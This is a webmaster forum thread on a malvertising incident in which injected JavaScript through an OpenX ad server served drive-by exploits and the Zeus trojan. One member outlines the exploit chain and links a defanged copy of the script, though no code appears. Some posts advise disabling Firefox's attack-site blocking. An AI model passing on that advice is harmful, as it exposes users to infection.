kblessinggr

So in the end, who/what is responsible for the exploit?

__________________
Twitter Facebook Blog
IonVz - Managed VPS (starting at 34.99/month) and Shared (39.99/year) hosting.
Directadmin only $10(non-recurring/one-time). We manage Nginx webservers. Why Nginx?
I can Fix, Slice, Configure or Install your Site/Server

seo101

Just happening for me today too... Firefox dont let me logged in unless I uncheck 'block reported site' on my firefox option

dankcash

I just had the exact same issue with Firefox. It wasn't like that when I first registered.. I wonder what made Firefox change its mind?

Infinite Keith

Fire Fox just gave me that error too. I'm on my Chrome which doesn't seem to care.

vinny lingo

I love that Google has the ability to fuck with a site's direct traffic. Well, obviously not Google, but whoever files the complaint. Ridiculous.

dawkinist

Was this an automatic exploit? Meaning, am I infected by merely loading and seeing the ad? OR does one have to click on the ad first?

pileofcrap

happened to me on Firefox, just an heads up

__________________

ScottDaMan

WTF? This thread explains what happened already. Quit being retarded.

__________________
Gay Webmaster Forum <-- Still #1 - LOL

bigballin

Call de ambalamps!

envision

Would be great to get a few more details about how this was done and whether you could implicate anyone. If this was really through the Maserati banner - shit I'm also running ads and I don't want mine to lead to malware warnings! Were these ads running through a network? Who is ads.is?

Webwonder

hurr durr mother fuckurr

Empress_Of_Drac

I don't see any warnings. Maybe because I uninstalled my AVG antispyware. Hmmmn...

Fatbat

Was blocked all night last night in Firefox and even if I chose to ignore the warning the site wouldn't load.

__________________
BRAD SHAW - GRAPHIC DESIGN [ WEB - PRINT - IDENTITY ] >>>

rgordon83

Do you guys Love WF so much that you just ignored the warning and came here anyway?

I saw that shit and i figured i could go a day w/o WF till it was fixed. Working for me now....

__________________
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Nam cursus. Morbi ut mi. Nullam enim leo, egestas id, condimentum at, laoreet mattis, massa.

travish

Same here. I had to refresh until it loaded correctly.

dawkinist

Doesn't anyone here find it weird that the Admins aren't telling us how they are affiliated with the group whose exploit was running? Or that they didn't explain the risks (how infection occurs, via just loading the ad and viewing it, or if one has to click on the ad, or what)? Or that they don't offer any other info on it? Just a quick "oh it was fixed, lets move on now, nothing to see".

rgordon83

Welcome to America.

__________________
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Nam cursus. Morbi ut mi. Nullam enim leo, egestas id, condimentum at, laoreet mattis, massa.

DewChugr

Temporary fix

Firefox - Preferences -> security -> un-check "Block reported attack sites"

__________________
if (preg_match("/SEO /i",$_POST['subject']) || preg_match("/search engine/i",$_POST['subject'])
header("Location: http://www.googlehammer.com");

Hey Newbie, watch the Wickedfire newbie video

xmcp123

What do you want to know?
It's a pain in the ass to track. If I go by the IP ranges, they're delivering the ZBot/Zeus trojan. If I go by whois information, they're using a exploit delivery mechanism written by someone nicknamed ExManoize. The whois information is fake but non-private, and has been used in a lot of similar drive-by exploits and fake antivirus software. The IP ranges are definitely bulletproof hosting, but once again are from eastern europe, so best of luck there.
Most trails go dead in serbia or mother russia.

The first script(included here) writes a script to another location. That script builds up a browser profile, then redirects to the exploit for the browser. All the javascript is encrypted.

If you want to see the code that runs the "end-script", I saved a (cleaned) copy here: //THIS CODE WILL RUNS UNKNOWN - Anonymous - zBHKyydY - Pastebin.com . Visiting that with Avast will still set off your antivirus, but it's not active and I swapped out the domain.

One method of infection is a Java class. Also apparent in the code is the fact that they can write to the c drive, and that they somehow gained access to the "ShellExecute" command, which more or less means the exploit can do whatever the fuck it wants.

Paranoid twats. Everyone except for me was working on getting the infection OFF the forum so fewer people would get infected rather than trying to track down who did it. That's why you didn't get much information.

Edit: If you want to fuck around with that Javascript I posted, GO OFFLINE BEFORE YOU EXECUTE IT. I'm unsure how functional that piece is, but it's a pain in the ass to tell what was successfully disabled. Also, one alert() in that script should actually be an eval, I forgot to change it back.

__________________

johnysc430

I had my antivirus off it loaded on my computer it kept redirecting my browser to infoprotector.net

I had to remove it from my registry which was a pain in the ass because it disables regedit. What a fucking pain in the ass lol

got rid of it, if you can't hit me up I'll show you how.

__________________

dawkinist

Paranoid twats. Everyone except for me was working on getting the infection OFF the forum so fewer people would get infected rather than trying to track down who did it. That's why you didn't get much information.

--

I'm sorry, and I understand that, the biggest detail missing for everyone, and I think still hasn't been clearly answered: does it infect your machine by simply loading a page which was displaying the ad, or does it require you to click on the ad/follow the link? Because if no interaction (click through) with the ad is required, merely having it displayed on a page suffices for infection, even though I run AV software, I and most likely others are infected and we need to take a closer look at our systems.

xmcp123

Yes. But it didn't run everytime. Out of ~30+ reloads I only saw it 2-3 times. Beyond that, the infection rate isn't 100%. If they were using a Java exploit(the only one I could recognize), chances are the infection rate was pretty low. But it's a definite possibility.

If your browser locked up when you visited Wickedfire, I'd run a full system scan before boot time. If not, I'd run some kind of scan at least just to be safe. This is the kind of thing your computer probably encounters quite frequently though.

__________________

envision

If this is a Java exploit, could it affect non-Windows systems? I mean, Macs run Java too. Then again, there's no C drive. And "ShellExecute" command - well, there's the Terminal, a UNIX-type shell...

I'd be curious how this was delivered. Did they inject JS code into WickedFire? How? Specifically targeting a weakness in WF? Through the banner? Was there an ad network involved and if so, were they also attacked and compromised or were they knowingly part of the scheme?

Jizzlobber

I put ketchup on everything.

__________________

xmcp123

It was some flaw in OpenX. If my understanding is right, we were fully patched. They did somehow inject JS code in.
It's hard to say if this could infect Macs. The way these systems work is they have decent sized pre-defined lists of exploits broken up by browser and OS. There isn't necesarilly an exploit for every browser on every OS(and my understand is that in most cases it only affects Windows), but it could be setup for Mac.
The Javascript that executes is supposed to determine your browser/OS, then send you to the proper exploit to infect. They get a nice little control panel that shows the success rate for each infection type and it's success rate.

Script Kiddy 2.0

Edit: No ad networks involved.

__________________

Unarmed Gunman

^^^ THIS. I couldn't fucking believe how many of you guys just bypassed/disabled the warnings holy fuck. All your campaigns are belong to them.

__________________

ScottDaMan

Was OpenX fully updated at the time? Open source always runs this risk.

__________________
Gay Webmaster Forum <-- Still #1 - LOL

dennyray

dankcash huh?
sup dg holla

Shawn Collins

Do you have the installed version or hosted on OpenX servers?

__________________
Shawn Collins

Next Affiliate Summit - Austin: May 15-16, 2012 // NYC: August 12-14, 2012

Stanley

We host it ourselves but it was 100% up to date.

We will no longer be using OpenX because this is not the first time it was exploited.

papajohn56

I had notifications turned off about this kind of things because I've gotten false reports before, so I didn't notice it

__________________

kblessinggr

__________________
Twitter Facebook Blog
IonVz - Managed VPS (starting at 34.99/month) and Shared (39.99/year) hosting.
Directadmin only $10(non-recurring/one-time). We manage Nginx webservers. Why Nginx?
I can Fix, Slice, Configure or Install your Site/Server

writtenstyle

Well... I am not so savvy as you. My AVG didnt catch it for some reason. I kept getting pop ups that redirects to that same site. Everytime I tried to load a file or click on a program, I wo9uld get a pop up that said csc.exe is infected and so on, would you like to install antivirus software>?

Anyway, seeing as how I am not technically savvy - after 24 hours of trying to fix the issue (I couldnt get online, the virus wouldnt let me open a single application) I ended up rebooting my computer and picking the wrong setting, and I wiped my entire computer out.

My computer is now loaded back to the day I took it out of the box. I lost MONTHS of content and other things. I just got the ability to get online, and found this thread. I quess this is where I got this from? It happened yesterday about 6pm Eastern.

-No Spell Check- I dont have Firefox reloaded, yet.

bingoo

Sucks man.

Stop doing anything, and run some data recovery software asap. You definitely won't be able to recover everything, but it might be able to recover some files or parts of it. The more you use your computer the less likely it'll be able to recover anything. When data gets deleted it isn't entirely gone yet, it is mostly still recoverable, except if it gets overwritten. So it really depends on the way your windows has been recovered weather or not you can recover anything. If it was a clean install you can forget recovering.

I can't recommend you any software brand for this though, it's been years since I last used it but I once managed to recover quite some files.

-Matt-

Hopefully you've learned your lesson about backups.

When I saw the warning I decided to go a day without WF. Surprised at how many people just ignored it.

__________________
HostGator: Fast, Reliable, and Affordable Web Hosting (Shared, Reseller, VPS, Dedicated)
Try 1st Month For $0.01 w/ Coupon Code WICKEDFIRE

IKILL8

No problems on firefox with me

writtenstyle

I never got a warning. I use Firefox, and just always leave WF loaded on a TAB. In fact, I blamed my wife for screwing up the computer, because it started happening while she was on the internet. I didnt know anyhing about this on WF, until I got my computer reloaded and found this thread.

xmcp123

Avast. Get it now. It's free, and it's saved my ass more times than I can count. It inspects all incoming packets and will actually terminate a connection from something trying to serve you naughty files.
When I posted the javascript the virus used into pastebin, Avast even blocked me accessing that PasteBin page...even though it couldn't execute. Quality shit.

I also recommend you recover your files NOW http://www.snapfiles.com/downloadfin...h=Find+it&lc=1 . The longer you take to do it, the more old locations on the HD are overwritten, and the less you'll be able to recover.

__________________

sgtryan

openX is a joke